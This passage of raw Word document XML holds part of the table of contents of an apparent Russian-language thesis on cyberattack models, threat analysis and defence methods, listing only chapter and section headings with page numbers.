            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6943C336" w14:textId="447DCB45" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761566" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">2.2 </w:t>
            </w:r>
            <w:r w:rsidR="008845FA">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Клиссификация моделей кибератак</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A818C6">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67A4D98A" w14:textId="7ED263C7" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761567" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">2.3 </w:t>
            </w:r>
            <w:r w:rsidR="004720E0">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Структура модели атаки</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A818C6">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A3A64B1" w14:textId="165AB352" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761568" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">2.4 </w:t>
            </w:r>
            <w:r w:rsidR="007957B2">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Применение моделей атак в реальнй практике</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A818C6">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D35A0CE" w14:textId="57A6DEDF" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761569" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">2.5 </w:t>
            </w:r>
            <w:r w:rsidR="0061241B">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Технологические и практические ограничения в моделях атак</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D66FC1E" w14:textId="03796B45" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761570" w:history="1">
            <w:r w:rsidR="002E1F8D">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ГЛАВА</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
              </w:rPr>
              <w:t>III</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="002E1F8D" w:rsidRPr="002E1F8D">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>ТЕОРЕТИЧЕСКИЕ И ЭМПИРИЧЕСКИЕ МОДЕЛИ АТАК</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32E2D959" w14:textId="120B22C4" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761571" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 </w:t>
            </w:r>
            <w:r w:rsidR="00846EFC" w:rsidRPr="00846EFC">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Теоретические модели атак: основы и применение</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43B90BFD" w14:textId="78FBC07E" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761572" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00846EFC">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> Пример дерева атак</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D0DCEE4" w14:textId="491A90EF" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761573" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">3.3 </w:t>
            </w:r>
            <w:r w:rsidR="00247A2A" w:rsidRPr="00247A2A">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Эмпирические модели атак: анализ реальных инцидентов</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05C6BC7A" w14:textId="395320A7" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761574" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">3.4 </w:t>
            </w:r>
            <w:r w:rsidR="00281743" w:rsidRPr="00281743">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Преимущества и ограничения эмпирических моделей</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="343937EA" w14:textId="3BA0D361" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761575" w:history="1">
            <w:r w:rsidR="00281743">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ГЛАВА</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
              </w:rPr>
              <w:t>IV</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00281743" w:rsidRPr="00281743">
              <w:rPr>
                <w:lang w:val="az-Cyrl-AZ"/>
              </w:rPr>
              <w:t>МЕТОДЫ ЗАЩИТЫ И АНАЛИЗ УГРОЗ</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1222CA34" w14:textId="590BE5B4" w:rsidR="005759DA" w:rsidRPr="000207C8" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761576" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1 </w:t>
            </w:r>
            <w:r w:rsidR="000207C8" w:rsidRPr="000207C8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="az-Cyrl-AZ"/>
              </w:rPr>
              <w:t>Анализ уязвимостей: поиск слабых мест в системе</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BB3D739" w14:textId="46B99CA6" w:rsidR="005759DA" w:rsidRPr="000207C8" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761577" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 </w:t>
            </w:r>
            <w:r w:rsidR="000207C8" w:rsidRPr="000207C8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Управление рисками: основы и принципы</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D54979A" w14:textId="08BEEDF8" w:rsidR="005759DA" w:rsidRPr="000207C8" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761578" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3 </w:t>
            </w:r>
            <w:r w:rsidR="000207C8" w:rsidRPr="000207C8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Сценарный анализ угроз: построение вероятных атак</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5148A604" w14:textId="44E5939C" w:rsidR="005759DA" w:rsidRPr="000207C8" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761579" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">4.4 </w:t>
            </w:r>
            <w:r w:rsidR="000207C8" w:rsidRPr="000207C8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Инструменты для анализа и предотвращения угроз</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B15D4B2" w14:textId="7526BB3C" w:rsidR="005759DA" w:rsidRPr="000207C8" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761580" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">4.5 </w:t>
            </w:r>
            <w:r w:rsidR="000207C8" w:rsidRPr="000207C8">
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Разработка планов реагирования на угрозы</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="000207C8">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F8DAA6C" w14:textId="1B3E3A54" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761581" w:history="1">
            <w:r w:rsidR="00774FBE" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ГЛАВА</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:t>ПРИМЕРЫ АТАК И ЗАЩИТЫ В КРИТИЧЕСКИХ СИСТЕМАХ</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38CFD185" w14:textId="1B66F287" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761582" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1 </w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:t>Пример атаки на банковскую систему</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17A59E74" w14:textId="31B7DB5B" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761583" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>5.2</w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:t xml:space="preserve"> Стратегии защиты при атаке на финансовые системы</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47BC9864" w14:textId="6F0096C7" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761584" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3 </w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:t>Маскировка атак и скрытые угрозы</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="292EFC69" w14:textId="7C0FAAE0" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761585" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="az-Latn-AZ"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4 </w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:t>Преимущества и недостатки различных методов защиты</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:lang w:val="az-Latn-AZ"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A9617F2" w14:textId="43ACB8AB" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761586" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>5.5</w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:t xml:space="preserve"> Обучение персонала и реагирование на угрозы</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
